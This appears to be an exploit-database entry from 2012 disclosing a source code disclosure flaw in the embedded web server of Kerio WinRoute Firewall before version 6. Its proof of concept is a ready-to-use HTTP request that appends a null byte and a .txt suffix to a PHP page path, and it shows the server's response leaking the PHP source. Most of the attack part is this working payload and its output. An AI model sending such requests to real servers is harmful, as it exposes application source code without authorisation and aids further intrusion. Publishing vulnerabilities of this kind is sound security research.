Kerio WinRoute Firewall Web Server < 6 Source Code Disclosure

# Exploit Title: Kerio WinRoute Firewall Embedded Web ServerVersion: Source Code Disclosure # Google Dork: # Date: 10.05.2012 # Author: Eugene Salov, Andrey Komarov (Group-IB, http://group-ib.ru) # Software Link: http://winroute.ru/kerio_winroute_firewall.htm # Version: prior to 6 # Tested on: Microsoft Windows # CVE : Source code disclosure attacks on Kerio Web Server allow a malicious user to obtain the source code of a server-side application. This vulnerability grants the attacker deeper knowledge of the Web application logic. POC: GET /nonauth/login.phpNULL_BYTE.txt HTTP/1.1 User-Agent: Group-IB OAiK Fuzzer Host: hostname HTTP/1.1 200 OK Connection: Close Content-Length: 2410 Content-Type: text/plain Date: Fri, 27 Apr 2012 13:42:27 GMT Last-Modified: Wed, 15 Oct 2008 03:14:06 GMT Server: Kerio WinRoute Firewall Embedded Web Server &#60;?php require_once(&#39;configNonauth.inc&#39;); require_once(CORE_PATH . &#39;langHeader.inc&#39;); require_once(LIB_PATH . &#39;Page.inc&#39;); require_once(LIB_PATH . &#39;HtmlElements.inc&#39;); require_once(CORE_PATH . &#39;common.inc&#39;); require_once(CORE_PATH . &#39;browser.inc&#39;); $afg = &#39;&#39;; $jy = kerio(&#34;webiface::PhpNonAuth&#34;); $jy-&#62;getAsocUserName(&$afg, &$aba); .....